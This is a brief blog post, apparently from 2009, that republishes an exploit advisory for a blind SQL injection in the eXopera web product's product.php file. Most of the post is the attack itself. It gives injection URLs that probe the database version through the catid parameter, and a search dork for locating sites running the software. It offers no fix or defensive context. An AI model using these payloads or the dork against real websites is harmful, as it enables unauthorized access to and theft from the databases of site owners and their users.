Home vulnerabilities eXopera Blind SQL Injection Vuln

eXopera Blind SQL Injection Vuln

By
Thursday, April 16, 2009
Read
Add Comment

[o] eXopera Blind SQL Injection Vulnerability
Software : eXopera
Vendor   : http://www.exopera.be/
Author   : NoGe


[o] Vulnerable file
product.php


[o] Exploit
http://localhost/[path]/product.php?catid=[SQL]
http://localhost/[path]/product.php?catid=1 and substring(@@version,1,1)=4
http://localhost/[path]/product.php?catid=1 and substring(@@version,1,1)=5


[o] Dork
"Powered by eXopera"


[o] Note
this a private script


Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us